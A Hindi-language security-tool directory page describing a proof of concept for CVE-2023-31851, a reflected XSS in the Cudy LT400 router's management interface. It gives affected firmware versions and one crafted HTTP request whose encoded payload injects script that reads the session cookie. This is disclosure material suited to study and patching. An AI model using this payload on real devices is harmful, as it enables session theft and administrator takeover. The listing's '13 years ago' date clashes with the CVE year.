Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-31851 — Cudy LT400 वेब इंटरफ़ेस में प्रतिबिंबित XSS के लिए प्रूफ-ऑफ-कॉन्सेप्ट, क्राफ्टेड अनुरोधों के माध्यम से सत्र कुकी चोरी और व्यवस्थापक अधिग्रहण का प्रदर्शन। | Kitploit
उपकरण/GitHubGitHub/calfcrusher/cve-2023-31851
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubcalfcrusher/cve-2023-31851

CVE-2023-31851

Cudy LT400 वेब इंटरफ़ेस में प्रतिबिंबित XSS के लिए प्रूफ-ऑफ-कॉन्सेप्ट, क्राफ्टेड अनुरोधों के माध्यम से सत्र कुकी चोरी और व्यवस्थापक अधिग्रहण का प्रदर्शन।

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-31851

Cudy LT400 के वेब-आधारित प्रबंधन इंटरफ़ेस में एक प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग (XSS) हमला मौजूद है।

पेज /cgi-bin/luci/admin/network/wireless/status में iface पैरामीटर के माध्यम से प्रतिबिंबित XSS मौजूद है।

शोषण के तरीकों में पीड़ित को एक विशेष रूप से तैयार अनुरोध भेजना शामिल होगा जिसमें दुर्भावनापूर्ण कोड शामिल हो।

प्रभावित एप्लिकेशन सत्र कुकी को HttpOnly विशेषता के साथ सेट नहीं करता है; इसके परिणामस्वरूप सत्र टोकन चोरी के माध्यम से व्यवस्थापक का अधिग्रहण हो सकता है।

कमजोर फ़र्मवेयर संस्करण: 1.13.4 - 1.15.18 - 1.15.27

PoC

root@kitploit:~
GET /cgi-bin/luci/admin/network/wireless/status?iface=wlan00%22%29%27%20href%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3Exss%3C%2Fa%3E HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED

विक्रेता

शेन्ज़ेन कूडी टेक्नोलॉजी (Shenzhen Cudy Technology)

CVE संदर्भ

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31851

उत्पाद संदर्भ

https://www.cudy.com

टूल डाउनलोड करें